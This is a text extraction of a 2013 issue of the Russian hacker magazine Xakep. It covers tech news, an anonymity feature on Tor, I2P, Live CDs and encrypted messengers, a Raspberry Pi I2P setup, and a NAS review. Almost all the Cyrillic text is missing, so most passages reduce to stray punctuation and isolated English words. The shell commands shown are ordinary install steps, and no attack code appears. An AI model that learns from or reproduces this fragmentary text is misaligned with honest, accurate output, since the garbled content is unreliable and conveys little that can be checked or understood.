
ANDROID 56

09(176) 2013

OLLYDBG

WWW.XAKEP.RU

,
-

: 290 .

12+

14

?
, ,
,

106

78

LINUX

Apache
-


MySQL

step (step@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
(ilembitov@real.xakep.ru)
(rusanen@real.xakep.ru)


PC ZONE UNITS
X-MOBILE PHREAKING

(ilembitov@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
(goltsev@real.xakep.ru)
ant (ant@real.xakep.ru)
(evdokimovds@gmail.com)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)

X-TOOLS
UNIXOID SYN/ACK
MALWARE
ART
, ,
, . ,
- . , ,
- . ,
, ,

. -

? ! ,

. ,
.
: XXI , , ,
, ! VPN,
, , whole
disk encryption , ,
, I2P, TOR,

! , 2013 ,

- .
,
!
Dr. Klouniz
][,
lozovsky@real.xakep.ru




DVD


Unix-
Security-

PR-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

(grigorieva@glc.ru)

shop.glc.ru, info@glc.ru




, .

46617
24231
46617

.: +7(495)935-7034;
8(800)200-3-999
, -,

(lapina@glc.ru)

, ! Xakep #08(175) (tregubenko_v_v@tut.by).

: 101000, , , / 652, . DVD-: claim@


glc.ru. : , 119146, . , 1- ., . 5. .: (495) 934-70-34, : (495) 545-09-06. : , 125367, . , , . 10, 1. , 77-50333 21 2012. Scanweb, . 190 000 .
. . ,
, .
. .
: content@glc.ru. , , 2013

14
?
, ,
. ?

NAS
35

,
-

- , , : I do my best. - , ,
, ,

MEGANEWS
? ! ,
PROOF-OF-CONCEPT
Live CD
aka Bobuk'
NAS4FUN
NAS
ASUS PQ321QE
4K- ASUS
ARM
Android
, , Android
EASY HACK
MySQL
Cuckoo Sandbox
Blackhole exploit kit
X-TOOLS
][-: , 2000 !
LINUX
Linux/Cdorked.A
XXI
WebRTC +
Linux-
HP ProLiant N54L G7 MicroServer:
FAQ UNITED
8,5
WWW2
web-

MEGANEWS

Mifrill

mifrill@real.xakep.ru

ANDROID 4.3,
?
GOOGLE

Android 4.3 Google, . , Android:


2.0 2.3
.
:
Project Butter ( ), TRIM (
-) Bluetooth Smart.
Gmail, Google
Calendar . ,
Google Play,
Android 2.2. , - ? , .
: (, -

).
.
SELinux
Android 4.2,
.
, , , , , .
,
.
: ,
root- Android 4.3
, .

,
,
.
.

SELinux
Android 4.2,

, Google
Find
My iPhone iOS.

Android Device Manager



.
,


.

09 /176/ 2013


HTTPS
30
Black Hat,
-, ,
HTTPS.
BREACH,
(, cookie CSRF-),
HTTPS-. ,
, , -

TLS SSL. CRIME (Compression
Ratio Info-leak Made Easy), .
JavaScript-.
,
JavaScript- , . ,
CSRF- 30 . 95%.

BITTORRENT
500


,
. ,
. , .
, MentaL, .
BitTorrent. , ,
.
BitTorrent Inc. .
, , . MentaL ,
, 500 .
, , , ( - ) -
! : bit.ly/1cxzzue.

Mail.ru
,
Google.
mail.ru
39,5 .

BitTorrent
-
BitTorrent Sync


,
.


Microsoft.

Google ,
IE 11. , .

Bitcoin .


.

cookie
, .
Netflix,
Twitter, Vimeo .


VPN



, VPN ,
. MasterCard Visa
VPN- (
). VPN- iPredator, The Pirate Bay .
Payson ,
, Visa MasterCard. Annonine,
Mullvad, VPNTunnel, PrivatVPN.
, ,
, , ,
. ,
- , .

900

,
PayPal,
.
,

Bitcoin, ,
BC .

MICROSOFT

, ,
Surface RT
900 .
,
.
Microsoft
11,4%.


rbth.ru. , 92%
,
. ,

12%. ,
70%
.

Oculus, Oculus Rift,
CTO. id Software
.

ESET : 60%
. 25%
.


GOOGLE-

01

NEXUS 7 GOOGLE CHROMECAST


Android, Google
, Chromecast
.
, Google , Nexus 7.
Android 4.3, .
- , : 1920 1080
, - Full HD. , , . 5 ,
Nexus 7. , . , Snapdragon S4
Pro 2 . Nexus 7 : 16
32 ,

Wi-Fi, Wi-Fi + LTE.
: 229 349
.
Nexus 7 ,
Google Chromecast .
, , ?
(12 12 )
HDMI- -,
, . ,
/ Chromecast ,

Android iOS Chrome. AirPlay, ? , , DIAL-, YouTube Netflix (
, ,
-). Chromecast,
YouTube Wi-Fi ,
. , - . -, Chromecast , HDMI . USB-
, ( ). -,
: YouTube, Netflix Google Play. . Chromecast 35 .

Chromecast
: YouTube,
Netflix Google Play.

GOOGLE

Bluebox
Android, 900
. APK,
. ,
,
.

02



, . ,
HBO Google , VLC Media Player. , ,
HBO, , .

03

Nexus 7 10% Android


. Google , .

.
,
160
. SQL-.


SIM-

01

SIM
, , , , 2009
GSM,
. SIM-.
Black Hat . , 2011 Security Research Lab
OTA (over-the-air, , SMS). SIM-, SIM ,
, RAM, ROM, ,
, . , , , , . SIM-
, Java. SIM- ,
Java Card. Java Card , .
, Java Card , Data Encryption Standard (DES),
70- !
, . Security Research Lab
: SMS, SIM OTA-.

, , ,

SMS.
56- DES .

SMS
, ,
, ,
SMS .



.
, .
SIM-. , IMSI-catcher,
.

02

,

SIM-


LibreOffice 4.1 Open Office
4.0, .
. , LibreOffice
. Open Office
.

03



SIM-,
.
:
.

,
750

.
SMS
.

? ?

Google , .
SSL-
70,2% Chrome. 15,1% .




-
Black hat
. ,
,
20 , . , ... .
, ,
.
Bitcoin , , Tor
.onion. ,
12 (10 + 2 ) 1,6532 BC
. , , .
. , ,
. , ,
, .

Vice
,


,

,


.

Firefox
23,
:
(, HTTPS,
HTTP-).

Adobe .


40%.

APPLE DEV
CENTER

Apple, -
. , ,
Apple Dev Center techcrunch.com.
,
. Apple 13 ,
. Apple, .
, .
Apple , ( !). ,
,
.

Apple
13
,


CERT-GIB
896 ,
. 86%
.

, ,
Joomla WordPress,

Trojan.WPCracker.1,
.


MOTOROLA
,
Motorola ,
- .
Moto X , Motorola
:).
, :
4,7 720p, Motorola
X8 (1,7 ), Adreno 320 GPU L-NLP CCP,
, .
2 16 32 -. ,
, Motorola , . ,
, ,
. 575 629
16 32 - .

3 4

,
Moto X
.
Ok, Google
Now


. , ,

.


GOOGLE
Google
7,32%
926,47 . , Google
304 , 50
.
, Google

.

116



-


, Burning Glass
Technologies.
2040 -,
.
:
116
, 55,77 .

Facebook
.
329 ,
13 .

DEF CON .
: youtu.be/rVwaIe6CiHw.


,
,


01

BOOTSTRAP 3
Bootstrap (blog.getbootstrap.com) CSS-. , ,
- -.
Bootstrap , , .
.
, navbar, Bootstrap .
, , , lightweight-. RC1 , , Bootstrap ,
.
Bootstrap . -, Bootstrap
IE 7 FF 3.6.
,
, . -, mobile first. Bootstrap .
span .col-* , .col-sm-* . ,
2.x, CSS- JS- . , CDN,
, .
. , ,
,
. 3.x
, .



46 ,
.
,
. .

02

3D-
3D-
Kickstarter
3D-.
Fuel3D 990 ( ). ,
, .

03

300
Bootstrap , Metro . . , ?
Microsoft , ?

Sony Panasonic
. 2015
300
. , ,
CD, DVD Blu-ray.


? !
,
, -, . ,
, -
. top secret
. ,
.

, , - .
, : , !
: .
,
- : ? (
,
.)

,
. . - .
,
.
Website down,
http://dvd.xakep.ru ( , DVD- ) .
, .

mqukisbx@sharklasers.com. ,
email, .
,
,
SMTP.
- Gmail ,
. , , ,
, ( ,
, ,
, ,
). .
, .
,
( SMTP). IP- . ,
, ,
. , , ,
? ?! .

, .
. ,
,
. :
1.
Mac ,
, . OS X?
, , , , , -
.
2. , ,
, SMTP.
!
3. . WTF?



Google (, , Gmail

), - .
:
(
Wi-Fi , , , ), 3G ,
99,99% ( iPad
Mini) . .

!
, ?
, ,
!
. , - . ?
100% ,
. .
, Google,
.

,
.

, (,
)
. ?
?

, .
. dvd.xakep.ru,

. , - .
. , ,
, - ?
- Google
App Engine, ...
Google Docs , , mqukisbx@sharklasers.com.
. !
Google Docs Is My Site
Down Digital Inspiration. -
Google
Docs (- VBA Excel) ,
Proof-of-concept.
,
- Google Docs
(bit.ly/HYQdju),
. (UrlFetchApp)
(MailApp.sendEmail).
( dvd.xakep.ru), .
-
,
:).
, , APT
, , . .
P. S. - .
. , . ?
,
Google.




Google Docs!


Proof-of-Concept


2013 Google
Loon (google.com/loon), - Google X.
Loon
20 . ,

,
830 /.

.
,
Google . ,
100 ,
. 20 , , .



.
. Google
.
, , 3G.

Google
,
.
40 .


(15- ,

. 1.

. 2. : (), ( ) ()

) ,

10 (. 1).
,

.
,
. 100 .
ISM, 2,4 5,8 .
(. 3). Wi-Fi, .
30
40-

. ,
,
, .
.
.
, .

. Google . 40-
300 ,
,
, .

. 3. Google
Loon

. 4. ,

. 5.

COVERSTORY

Dr. Anonymous

15
,
, ,
,
,
. ,
, , ,
! , ,
,

. !
, - ? privacy,
, ,
?
.
Pentium 166 16 .
, ! ,
CD-ROM
Sound Blaster 16 . 33,6
FTN-, BBS
. Internet Explorer 4.0
,



1995-1998 .

? , www.iproxy.com ,
cookie .
, ? FedWorld Information Network (www.fedworld.gov)
, .


, 1997

,
, .
-
, 11
1998, . ,



, . , , ,
, 21-

[NetserpNT //RUC]
, .
! , 20
1994 ,

.
-
, www ,
IRC, ICQ
Microsoft Windows
, ,
95
dialup-
1998
.
...
IP
10 ,
, . , ,

.

IP-, , .
, , .

1994 (
INFECTED VOICE, )
: -148, / 10 Stealth
( , , . . .).

1997 (
INFECTED VOICE, )
email-,

Internet. PGP.
PGP ,
email, . ,
, , , ,
/
10. (
PGP, 2.6.i for DOS
1024 (
). PGP ,
,
. 1997
! ? . .)
. , -
? -

IRC-.
, , IP-p IRC ,
. H y p : IP spoofing
p-pp, p IRCp. , IP spoofing ( IP), . p
p Windows
95 p Winsock 2.0
pp p.
Microsoft Outlook Express 4.0 ,
p - p, y
y, p p .
y p py y
(y , pp
pp Kremlin 2.1) .
yy , pp,
, pp, p Windows, ,
p p ( ,
p), p


p pp (-
Google Chrome, Chrome OS? ,
? . .).
H , FTP- p
p pp. y
!

,
,
( ) .
p , ppy
( p),
p .
py
pp . p .
p . p p
p , p
p p, p y, p yy p y.
p p y.

15

p pp ,
. p
pp aka BBS,
pp ;). p ! H
100%. login, password.
Windows 98, , .

Microsoft.

(?) Windows 98.
,

( ,
! . .).

1996
y p
p ,
, p . y
p (. 43/96),
pp
p y
yy -pypy
p -p.
Remailer ,
p
y p
p,
p y ,
.
pp, py
remailer@replay.com, y Subject:
remailer-help.
pyp
pp :
p p ( p);
py pp;
p (, p, p
. .) p
p;

p
py . .
, (
p
)
p
p
p , p p p
p.
p-pp
. pp p
p : http://www.tamos.com/bin/proxy.cgi.
y Proxy server is
detected! p py.

1997 BY MIKE SMITH


Hp -.
pppp , -

DISCLAIMER
,
, .
. ,
,
( ,
).

(Microsoft)
(
, Windows 98)
, , ( , , . .) ,
, ,
.

,

Windows!
,
.

Windows.

,
, 1996
:

, . ,
- . ,
.
AWARD BIOS
AWARD_
SW Paradox Borland
International, jIGGAe nx66ppx.
(,

) ,

,

CLIPPER,
,

.


,
, good!password. ,
, -
( 10 000 ,
10 32 ,
Pentium 10 000 crypt/) := 210 000
, 2,5 !

, WEB@HACKZONE.RU
ICQ (http://www.icq.com)
. Fyodor's Exploit world
ICQ , ,
ICQ . , , ICQ
Snoofer Team , ICQ
UIN. Snoofer , ,
, . IP- , , ICQ, UIN .
.


ant
ant@real.xakep.ru


,
, . ,
. ,
PRISM
, .

TOR


.
.
, ,
?
: Microsoft (Hotmail), Google
(Google Mail), Yahoo!, Facebook, YouTube, Skype,
AOL, Apple. , PRISM
, 1,7 ,
,
.

PRISM
: ,
Tor. , ,
,
.
,
. .
Tor, ,
,
. .

Tor -

Privoxy
, HTTP-
-, .

, GUI- Vidalia,
.
,
Tor, Vidalia portable Firefox security-.
TorChat. , TCP/IP- DNS-
Tor Tortilla.
Windows
,
SOCKS HTTP-,
Windows. , Tor + Vidalia + Privoxy Advanced Onion Router
(bit.ly/ancXHz), portable-
. , , Live CD ,
Tor, bit.ly/e1siH6.
Tor -


. ,
.

I2P
,
, I2P. Tor I2P
. Tor ,
, I2P

.
.
, ()
.
, ,
.
,
,
, , .
I2P, Tor, ,
,
-, I2P eepsites.
I2P
Java. -,
127.0.0.1:7657.

, , .
I2P,
.i2p. , - 127.0.0.1:4444. I2P

Tor Vidalia

17

( outproxy). ,
.
,
. I2P-? , 100%-
,
,
.

GNUNET
?
GNUnet (bit.ly/hMnQsu)
P2P-,
. ,
.
, .
, , , .
URI,
gnunet://module/identifier, module
, identifier ,
.
: ( )
( ).

ECRS (An Encoding for Censorship-Resistant
Sharing ). GNUnet ,
P2P-. ( ), : ,

I2P

OBFSPROXY
,
,
Tor,
DPI (deep packet inspection),
,
.
, torproject obfsproxy (bit.ly/z4huoD),
,
.

obfsproxy

, DNS. ,
: ,

(
).
.

RETROSHARE
RetroShare (bit.ly/cndPfx) F2F (Friend
To Friend), GPG. ,
, - darknet.

18


RetroShare
GPG- ( ).

SSH-, OpenSSL.
( ),
. :).
.
: , , ( , ), (VoIP-), IRC.

GNUnet

RASPBERRY PI

F2F-

: Raspberry
Pi? . ,
. /,
Tor/I2P- VPN.
, .
,
. , I2P

, ,
.
, 30
.
,

- .
,
I2P, Java,
. Java-
256 . Raspberry Pi model
B, 512 ,
. , . ,
Raspbian (bit.ly/ys8SAK).
:

clientApp.0.args=7657 ::1,127.0.0.1 ./webapps/

sudo apt-get update; sudo apt-get dist-upgrade

clientApp.0.args=7657 0.0.0.0 ./webapps/

Java,
, ,
ARM, bit.ly/13Kh9TN ( , ).
:

i2ptunnel.config

sudo tar zxvf jdk-8-ea-b97-linux-arm-vfp-hflt-03_jul_2013.tar.gz -C /usr/local/java
export PATH=$PATH:/usr/local/java/bin

0.0.0.0. I2P, :

Pi VPN ( ,
bit.ly/11Rnx8V) Tor ( : bit.ly/12RjOU9).
, .

MIKROTIK

tunnel.0.interface=127.0.0.1
tunnel.6.interface=127.0.0.1

cd ~/i2pbin
./runplain.sh

I2P:

cd ~
mkdir i2pbin
cd i2pbin
wget http://mirror.i2p2.de/i2pinstall_0.9.7.jar
java -jar i2pinstall_0.9.7.jar -console
Raspberry I2P,
. ~/.i2p
clients.config.

crontab
, :

0 * * * * /home/pi/i2pbin/runplain.sh
@reboot /home/pi/i2pbin/runplain.sh
. SSH.
I2P, 22- .

Raspberry Pi
, . MikroTik (bit.ly/mcyQK),

.
, .
RouterOS
Linux, MikroTik
RouterBOARD.
RouterBOARD : .
,

PoE. (bit.ly/jSN4FL),
,
security- RouterBOARD4xx, Tor.
, : bit.ly/1cmX6xU .





,
.
. ,
, ,
(
, ).

.
,
, , .
- .

Disconnect

,

.
Firefox, Opera Chrome,

Adblock Plus (bit.ly/19WLfF9).

, ,
Firefox,
Chrome, Opera Safari. (bit.ly/16bI6vW)

, ,
.
,

(),
,
( , , , )

.

.


Disconnect, ,
DoNotTrackMe (bit.ly/yUj0ty).
. ,

, DoNotTrackMe
.
,
, .

Adblock Plus

Ghostery

(
)
. , , -

, ,

.
.
, -

IE. ,
, .
(bit.ly/PZk).

VPN
DoNotTrackMe




Tor MikroTik

MikroTik
RouterBOARD
RB411AR


, -
. ,
. ...
, , 100%-
. , , Tor, I2P -
, .

,

VPN. ,
VPN-
Amazon (bit.ly/16E8nmJ),

OpenVPN (bit.ly/14FHItM).

.
, VPN .
-, ,

VPN-, -, , PPTP,


(
VPN, ][ 170).

.


LIVE CD,



Linux ,
, -
.

,
Live CD / Live USB. ,

.


rommanio@yandex.ru

, , :
Tor ;
I2P ;
IM-.
Hardened Gentoo,

, PaX, .

TAILS

LIBERTÉ LINUX

TIN HAT

https://tails.boum.org

dee.su

opensource.dyc.edu/tinhat

: Tails
: GNU GPL
: PC USB/DVD, 1
:

: Maxim Kammerer
: GNU GPL
: PC USB/DVD, 1
:

: D'Youville College
: GNU GPL
: PC USB/DVD, 4
:

Tails The Amnesic Incognito


Live System, Incognito Linux,
Debian.
0.19:
3.9.1;
GNOME 2;
Tor/I2P;
SSL , Tor,
Unsafe Web Browser.

Liberté Gentoo, ,
Hardened-. , . :
3.4.7;
LXDE/Openbox;
Tor;
Florence.


Windows XP.
, , , - .

.

, I2P . Cables
communication,
.
, , Claws-Mail.
, Tails, . ,
, Tails .

,
Hardened Gentoo
, ,
tmpfs, . DVD, Live-

, ( ),
. ,
, ,
.
, loop-aes,
( , NSA, , ).
Tin Hat ,
.

9/10

9/10

8/10

8/10

7/10

8/10

10/10

10/10

10/10

. , . , FreedomBox
,
.
. , , -

FREEDOMBOX
freedomboxfoundation.org
: FreedomBox Foundation
: GNU GPL
: Plug-
(, Raspberry Pi)
:

.
-,
. - , , , ,

DreamPlug ,
FreedomBox

8/10

6/10

5/10

: LPS .
, -

WHONIX

JONDO LIVE-CD/DVD

LIPOSE (LPS)

sourceforge.net/projects/whonix

bit.ly/UpSh9Y

spi.dod.mil/lipose.htm

: whonix.org
: GNU GPL
: PC VirtualBox,
2 , 10
:

: JonDos GmbH
: GNU GPL
: PC c DVD/USB, 1
:

: US DoD
:
: PC USB/DVD, 1
:

Live- Debian
(, Gentoo) Xfce.
:
JonDonym, Tor. - , .
Tor .
MixMaster , email.
: , remailer;
.


. . :
LPS-Public Firefox Flash, Java
- (CAC PIY)
;
LPS-Public Deluxe LibreOffice Adobe
Reader ;
LPS-Remote Access . ,
VPN-.

Whonix : Whonix-Gateway Whonix-Workstation.


,
. , IP Skype/
Thunderbird/Flash-,
, IP . Windows
, , ;
Whonix-Workstation.
Debian, , .
KDE.

Live DVD ,
LibreOffice, Gimp .

. , -.

9/10

9/10

7/10

9/10

8/10

8/10

7/10

7/10

8/10



SYN/ACK

NFS, SMB/CIFS, FTP


, Dropbox.
,
.

,
.


grinder@synack.ru


OWNCLOUD
, , .
Dropbox,
, , ( ), TODO . , .
( Git,

),
.
, -.
PDF- ODF-, , .
-.
, , remoteStorage.
, Apache Lucene,
, .
, ,
. (apps.owncloud.com).
,
( ClamAV),
,
, - .
OpenID LDAP, Dropbox, Swift, FTP, SFTP, Google
Docs, S3 WebDAV.
ownCloud (
/Shared), ( ).
KDE (Open Collaboration Services
API, KDE).
- WebDAV, KDE
KIO-Slaves,
. ,
. ownCloud Desktop Client Mobile
Clients,
Windows, Linux OS X Android (
) iOS (iPhone/iPad/iPod). , App Store, ownCloud
. ,
Dolphin, Nautilus, Finder Explorer
ownCloud.

ownCloud

, , ,
Dropbox SkyDrive . , .
,
TrueCrypt (truecrypt.org), .
:
Viivo (viivo.com) ( SecretSync)
Dropbox.
, , , (AES-256) Dropbox.
.
Windows, OS X, iOS Android.
Boxcryptor (boxcryptor.com) , Dropbox,
Google Drive Microsoft SkyDrive, SugarSync , WebDAV, AES-256.
Windows, OS X, iOS Android. Free
( ) .
CryptSync (stefanstools.sf.net/CryptSync.html) Dropbox,
Google Drive, SkyDrive . Windows.
GNU GPL.

ownCloud
, .
,
.
ownCloud PHP JavaScript,
SQLite, MySQL PostgreSQL. LAMP- WAMP-,
.
,
ownCloud
( PHP- ,
). .

ownCloud


AjaXplorer

AJAXPLORER
AjaXplorer (ajaxplorer.info) ,
-,
-,
-, iOS- Android- WebDAV.
-,
. (, , PDF,
).
. . , .
- ( ), . (, ), (
), . .
, . .
AjaXplorer
.
Active Directory /
LDAP, HTTP, CAS, FTP, OTP . , , , .
.
HTTPS
EncFS.
2013 (sysdream.com) AjaXplorer,


, , .
(Bridges),
AjaXplorer CMS, PHP, Drupal,
WordPress Joomla. API,
. AjaXplorer for Filelink (goo.gl/S8PlO6) Mozilla Thunderbird AjaXplorer.
. ,
( , FTP, SFTP, Samba, Amazon S3, Dropbox, HPCloud, IMAP,
POP ), .
( - Zoho),
, Exif-,
- .
,
. ,
,
server/conf/conf.access.fs.inc.

AjaXplorer, ajaxplorer.info/plugins. ,
, .
Apache Lucene.
AjaXplorer HTML, PHP, Ajax
JavaScript.
, .

AjaXplorer , CMS, PHP, Drupal, WordPress Joomla.


API, .


SEAFILE
Seafile (seafile.com).
2012 , 1.3
, . Seafile ,
.
( , ) ,
.
.
.
.

( ), HTTPS. ( 60 ,
, ),
, , ( ).
, , , Wiki.
,
.
-,
Seafile (Windows, Linux, OS X, Android
iOS).
Python
GPLv3,
SQLite. Community Edition Linux Raspberry Pi, Windows -

150 . Pro Edition : WebDAV, ,


email ( : bit.ly/1cMiZVe). ,
(
1 ).

Seafile
,

,
. AjaXplorer ownCloud
, Seafile
, .

-
, , Apple iCloud, Ubuntu One, Microsoft SkyDrive. , , . ,
, . ,
, :
Wuala (wuala.com)
(Windows, Linux, Android, iOS, Java -), .
, ,
. AES-256 , RSA-2048 ,
SHA-256 ; SSL. .
, . , , ( ).
.
. 5 ,
1 .
SpiderOak (spideroak.com) , 2007 , Wuala. 2 , 100 . Windows, Linux, iOS, Android N900
( BlackBerry Windows Phone), -. Enterprise-
, SSO AD/LDAP,
. AES-256/RSA-2048. SSL.
Tresorit (tresorit.com) , 5 (
50 ), (AES-256/SHA-512),
Windows, iOS Android. - . .
Mega (mega.co.nz) ,
50 , $$$ 4 . (AES-128) JavaScript ( HTML5 API
WebCrypto). C SSL.
, ,
/ . ,
.

Mega.co.nz 50 ,

Wuala


yurembo
yazevsoft@gmail.com


. , , . Jabber, .
, , - -
.

OTR (Off-the-Record).
AES, , - SHA-1.
OTR
, .
.
. , IM-,
.
Cryptocat; -
, JS. Chrome, Firefox Safari. , , OS X.
.
AES-256 . .
,
. , - Whirlpool,
HMAC-WHIRLPOOL.
Cryptocat , .
30 ,
SSL-.
Bitmessage, . Bitmessage P2P- / .
, - . , ,
P2P- Bitcoin, . Bitmessage ,

:

, ( Tor). ,
.
, ,
TorChat. TorChat

.
, , . TorChat
Tor, .
Tor, TorChat, ,
, .
Tor RSA. TorChat
, OS X, ,
Objective C. 2012 jTorChat,
Java.
TorChat, .

INFO


,

,


(https://heml.is).


lavabit.com,
. ,
.
Lavabit ( self-hosted ),
- VFEmail
(https://vfemail.net).
. , .
,
SpamAssassin. VFEmail POP, IMAP, SMTP, - SSL-.
, VFEmail
Microsoft Office . . , ,
, 50 . , .



,
? Skype
Microsoft, ( ) .
. Tox (tox.im) Skype.
Skype P2P
,
.
,
, .
IM- .

,
. - (DHT),
BitTorrent.
UDP
(Lossless UDP).


Hemlis


,
.
,
/ . (
),
(
).
Tox GPLv3. Linux, Windows
OS X. libsodium.
, ,
ncurses, Qt5.
, GNU
GNU Free Call.
. GNU Free
Call SIP,
VoIP- GNU SIP Witch.


,
.
:
, ,
.
,
, . ,
!
- .
.

,

. ,
, 15-
, ,
. ,
,
.
Friendica (friendica.com). 2011
. Friendica ,
GitHub. :
(Facebook, Twitter), (Diaspora,
Identi.ca). , Friendica

Friendica ,



-
.
:
,
, /,
P2P- mesh-,
.
VoIP-,
Skype .
GNU SIP
Witch, SIP-, VoIP-,

mesh-.
VoIP- ,
SIP-
.

Diaspora

Tox
Skype

c GNU Free Call


.
, .

, - .
: , ,
/, . ,
( ) . !
!

RSS. Friendica ,

(, ,
) .
Red
( ).
, Friendica
,
.
,
,
Diaspora (https://joindiaspora.com).

.
, -, , Diaspora,
, . ,
(pod) ,
. ,
, , ?
. ,
, ,
, ,
.
, .

30

08 /175/ 2013


AKA BOBUK


- -, . -
. - GitHub. -, , , ,
. : , , -
. . . .

- , , : I do my best.
, , , . ,
. - , , ,
, .
,
.
, , .
56 ,
.
, . ,
, .
,
.
,
, :
. , .

. , :
, . .
, ,

. , , ...
, .
.
, . . , ?
, , ,
, . .
... .
- ? .
, , ,
.

Cassandra? ?.
Cassandra,
open source.
, , ,
Cassandra, , .
: , , , ,
. .
, , , . , , , ,
. - ,
, . ,
Windows Phone , , - . , ,
, .
, , . ,
.
, - .
,
, .
Yet another Conference (YaC). ,
.
, . ,
500
, . - Prismatic, .
, . , ,
, , , . , , ,
, .



, . ,
- .
, .

. ,
, ,
, . .
, . , .
, , . - .
, , ,
. ,
- :


. : , . , . !.
- , , .
, , : , . .

2006
-.


,
, .
: 24 .
:

.
. ,
6,6
,

.
,

.

>350

-
.
2006 .

- ?
. ,
, ,

32

. .
team lead ,
. , . ,
.
, .
.

, .
user
experience. , , .
,
.
( . . .),
. ,
. , ,
.
. -
,
(
hi-tech ),
,
,
2006 .
,

,
350 .


.
300 ,

2000
. .
.
,
,

, .
,


.

. , ,
.

,
.
.

- . , , . , ,
- .
.
, - . . ,
.


, , ,
. , , . , , .
, , ,
, !
.
, .

,
.
,

.
,


.

. ,
.


,
. ,
,

,


.

.
,

,


,
.
,

,
.

.


YAC13

.
.

, .
YaC (Yet
, another Conference).

2013-
,
. -
,
,

,
, ,


, , , .
.
,
IT (big data)
: bootloader.

(big maths). Spectrum,

events.yandex.ru.
. ,

,
. , 100% warez, .
, ,
.
,
, , . . ,
bootloader , .
, , :
.
,
, , .
.
, . ,
ASPLinux ( SWSoft, Parallels), - ,
.
, IT . , IT
. :
,
.
,
IT. - 1015 . , , .

?
:
. . , . , .
, . (
, ), . ,
, .

- , , . . , .
, , ,
. -
.
, .
,
. , , ,
.
.
,
.
.

. ,
:

IT . : ,

>500 000

-.

2000

.

34

, (

) .
,
, - . ,
-
.
,
, - .
,
. ,
.

-
, .
, - .
:
? ,
- .
:
!
- .
.
. ,
, ,
.
,
.
, , .
, .
, . : , ! , , - ,
, , , ,
, .
. - , , . ?
, - . , (
). : - .
, , . , ,
. , ,
- ?.
Skype. .
.

-
, .
,
, ... .
,
.
.
... , , CDN,
.
-, , ,
.
, ,
, . . , , , , .
. ,
.
.
- ,
, . ,
, , ,
, . , .

- .
, ,
. ,
,

>5000


,

.

NAS effect

NAS4FUN
NAS
NAS-
. .
,
!

NAS
Intel NAS Performance Toolkit (Intel NASPT). :


HD-.
,
RAID 0. RAID 5, , ,

.

: , ,
NAS.
,
.

Ferrum

36

32 000
.

+

,
USB 3.0


-
Boxee


01

ASUSTOR AS-604T

AS-604T ,
.
, .
USB 3.0
,
.



,
HDD.
IP-

, .
AS-604T I/O-
- :
RJ-45, USB ( ),
eSATA HDMI. NAS
( AS-604T Boxee).
(
AS-604T ) 120- . 4- , .
.

. Control Center.
ID.
.
- AS-604T ADM (ASUSTOR Data Master)
. ,
. , ,
. .
90. , 2011 !
, ASUSTOR , .
. ADM .

20 500
.

02

BUFFALO LINKSTATION
PRO QUAD

NAS
LS-QV4.0TL/R5-EU, , .
LS-QV8.0TL/R5-EU

LS-QV12TL/R5-EU

8 12
.
. USB 3.0
, Marvell

RAID 6
.
LinkStation Pro Quad
.
USB 2.0 ( Function). .
USB 2.0 Ethernet . NAS. Auto .
.
, , .
, , .
Western Digital WD10EARS Caviar
Green. RAID 5, , RAID 6.
- LinkStation Pro Quad, , . ,
. :
, /, , .
LinkStation Pro Quad
. EXE- ,
. LinkStation Pro Quad
, BitTorrent, Time Machine, iTunes, -,
NovaBACKUP WebAccess, .
Buffalo LinkStation Pro Quad . NAS, .


12 000
.

+
NAS
USB 3.0


03

NETGEAR
RND4000-200EUS

.


/ , RAID 6
,

USB 2.0 backup.


IP
. .
. : , HDD, .
. NAS ,
. , ,
USB 3.0 RJ-45.
.
ReadyNAS NV+ v2 Marvell
Armada XP, 1,6 . ,

. .
256 . NAS
: , SATA, PCI Express x4.
RAIDar Corrupt Root. NAS ,
.
RAIDar. RAID 5 , . ,
.
- RND4000-200EUS RAIDiator V5 . : clck.ru/8cuUs.
DVBLink, NAS , ReadyNAS
Surveillance, IP-, Egnyte
Cloud File Server ,
NAS (clck.ru/8cuaG).
ReadyNAS NV+ v2 , 2 4 .

35 000
.

+

NAS

04

QNAP
TS-469 PRO

TS-469 Pro Intel Atom D2700.


2133 , , (
Hyper-Threading). NAS
. ,
,

TS-469 Pro
. TS-469
Pro ,
3 . SO-DIMM.

( ) , Power USB 2.0
. LED .
, Status, LAN, USB, eSATA.
3,5-, 2,5- .
TS-469 Pro I/O - . . , .
. RJ-45, USB,
, , eSATA. NAS
: VGA HDMI , , . Kensington.
, TS-469 Pro .
. TurboNAS 3.8.
Windows 8. : qnap.ru/demo.
. 4.0.
. - TurboNAS 4.0
.
.
-. QNAP
HTPC.


16 000

25 000

+


DSM

05

SYNOLOGY
DISKSTATION DS413J

DS413j
:
, -,

- .
.
, USB 3.0
. DS413j

. , NAS


Apple.
: ,

.



, LAN Status. ,
.
, c, USB 2.0, RJ-45
. ,
USB 3.0, DS413.
DS413j , . 41 .
,
. .
, 3,5-,
2,5- .
DS413j .

-. Synology , DS413j .
DSM .
DS413j ,

. , , : -, - . , USB- HD-.

06

I/O

THECUS
N4800ECO

N4800Eco
N4800. NAS 20% .
CPU


. ,
IP
N4800Eco

.

N4800Eco .
PCI Express x1 (
) mini-PCI Express,
. , .
N4800Eco . . .
USB- .
. . NAS.
.
USB ( ), eSATA RJ-45.
VGA, , HDMI.
NAS, N4800Eco 3,5- .

-. ThecusOS 5.0, , Flash. . .
.
. 20 . Android iOS.
- ,
-: clck.ru/8clXj.
. ,
, UPS .


01

:
:
:
:
:
:

02

ASUSTOR AS-604T

Buffalo LinkStation Quad

NETGEAR RND4000-200EUS

Intel Atom D2700, 2,13


DDR3, 1
2 RJ-45 (10/100/1000 /),
2 USB 3.0, 4 USB 2.0, 2 eSATA, 1 HDMI
RAID 0/1/5/6/10, JBOD
AFP, FTP, HTTP/HTTPS, iSCSI, Rsync, SSH,
SFTP, SMB/CIFS, WebDAV
, -,
, -, iTunes,
Boxee, BitTorrent, Time Machine

Marvell, 1,6
DDR3
1 RJ-45 (10/100/1000 /),
2 USB 2.0
RAID 0/1/5/10, JBOD
AFP, Bonjour, FTP/SFTP, HTTP/HTTPS, SMB/
CIFS, TCP/IP, UPnP
, -, iTunes,
BitTorrent, Time Machine, NovaBACKUP,
WebAccess
4 , 8 , 12

: Marvell, 1,6
256
1 RJ-45 (10/100/1000 /), 2 USB 3.0,
1 USB 2.0
